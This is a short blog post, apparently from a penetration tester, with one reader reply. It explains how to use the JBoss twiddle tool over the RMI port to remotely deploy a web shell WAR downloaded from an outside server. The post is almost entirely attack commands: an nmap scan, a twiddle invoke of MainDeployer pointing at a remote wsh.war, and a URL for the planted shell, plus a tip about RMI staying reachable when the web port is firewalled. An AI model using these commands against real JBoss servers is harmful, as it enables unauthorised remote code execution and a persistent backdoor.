How to use twiddle – Jboss by command line

twiddle is a command line tool you can find in the bin/ directory of any jboss <7 versions; in jboss7 it has been replaced with a management interface (Jboss 7 CLI) . What you usually do with twiddle is:

nmap RHOST -p 1099, 4444, 8080
twiddle.sh -s RHOST invoke "jboss.system:service=MainDeployer" deploy http://my.public.server.com/wsh.war
(go to) http://RHOST:8080/wsh/

4444 is Jboss RMI default port – if you cannot reach the RMI port, any twiddle call will not work

This is to upload a web shell and then interact with  it through 8080; sometimes you can’ access 8080! This happened to me at least twice, as the administrator shielded the web port through iptables, but left the 4444 open. This article about how to interact with an application through RMI was extremely useful http://www.contextis.com/research/blog/inf1/

Other links:

Advertisements

2 thoughts on “How to use twiddle – Jboss by command line

    • The RMI method should, in both ways; RMI depends on local servlet like invoker.sar and others. The JMX-Console or the Admin-console (jboss6) are only ways to invoke them, so their absence does not implies it is impossibile to use invoker or other services (JNDI). If they hardened Jboss in a proper way, there should be no possibility to invoke them without a password OR from other host rather than localhost.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s